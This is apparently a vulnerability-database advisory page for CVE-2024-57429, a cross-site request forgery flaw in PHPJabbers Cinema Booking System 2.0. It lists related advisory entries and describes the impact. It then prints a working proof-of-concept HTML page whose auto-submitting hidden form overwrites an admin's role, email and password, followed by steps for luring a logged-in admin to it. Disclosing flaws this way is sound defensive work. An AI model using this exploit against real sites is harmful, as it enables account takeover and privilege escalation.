| Reporter | Title | Published | Views | Family All 23 |
|---|---|---|---|---|
| PHPJabbers Cinema Booking System 2.0 Cross Site Request Forgery Vulnerability | 5 Feb 202500:00 | – | zdt | |
| CVE-2024-57429 | 4 Feb 202516:00 | – | circl | |
| WordPress plugin Simple AL Slider security vulnerability | 28 Jun 202400:00 | – | cnnvd | |
| PHPJabbers Cinema Booking System 安全漏洞 | 6 Feb 202500:00 | – | cnnvd | |
| CVE-2024-5729 | 28 Jun 202406:00 | – | cve | |
| CVE-2024-57429 | 6 Feb 202500:00 | – | cve | |
| CVE-2024-5729 Simple AL Slider <= 1.2.10 - Reflected XSS | 28 Jun 202406:00 | – | cvelist | |
| CVE-2024-57429 | 6 Feb 202500:00 | – | cvelist | |
| EUVD-2024-53584 | 3 Oct 202520:07 | – | euvd | |
| CVE-2024-5729 | 28 Jun 202406:15 | – | nvd |
# CVE-2024-57429
A cross-site request forgery (CSRF) vulnerability in the pjActionUpdate function of PHPJabbers Cinema Booking System v2.0 allows remote attackers to escalate privileges by tricking an authenticated admin into submitting an unauthorized request.
## Impact:
Exploitation of this CSRF vulnerability can lead to unauthorized actions, such as:
- Changing the admin's password, effectively locking them out.
- Elevating the attacker's privileges to admin by updating their user role.
## Exploit - Proof of Concept (POC)
### Cross-Site Request Forgery (CSRF)
### poc.html
```
<html>
<!-- CSRF PoC - Update Admin User -->
<body>
<form action="http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionUpdate" method="POST">
<input type="hidden" name="user_update" value="1" />
<input type="hidden" name="id" value="3" />
<input type="hidden" name="role_id" value="1" />
<input type="hidden" name="email" value="[email protected]" />
<input type="hidden" name="password" value="newpassword123" />
<input type="hidden" name="name" value="Attacker" />
<input type="hidden" name="phone" value="1234567890" />
<input type="hidden" name="status" value="T" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
```
1. Save the above code as poc.html
2. Host the file on a server and trick the admin into accessing it while logged into the application.
3. The admin's account will be updated with the attacker's details and new password.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation